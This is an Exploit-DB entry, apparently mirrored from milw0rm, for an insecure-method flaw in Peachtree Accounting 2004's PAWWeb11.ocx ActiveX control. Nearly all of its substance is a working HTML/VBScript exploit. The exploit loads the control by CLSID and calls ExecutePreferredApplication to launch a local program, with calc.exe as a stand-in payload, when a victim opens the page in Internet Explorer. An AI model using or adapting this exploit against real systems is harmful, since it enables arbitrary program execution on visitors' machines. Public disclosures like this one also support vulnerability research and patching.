Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method

EDB-ID:

6414




Platform:

Windows

Date:

2008-09-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Peachtree Accounting Remote (SfS/SfI) Exploit
     Tested on Peachtree Accounting 2004 / Windows XP / IE6
     All Peachtree software that includes PAWWeb11.ocx are assumed vulnerable -->

<html><body>

<object id=target classid=clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0></object>
<script language=vbscript>


arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1

</script>
</body></html>

# milw0rm.com [2008-09-10]